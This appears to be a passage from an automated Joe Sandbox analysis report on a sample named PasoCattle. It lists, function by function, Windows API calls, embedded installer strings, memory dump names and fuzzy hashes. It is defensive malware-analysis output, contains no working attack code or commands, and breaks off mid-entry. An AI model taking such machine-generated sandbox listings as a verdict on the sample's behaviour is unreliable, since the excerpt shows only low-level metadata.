Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
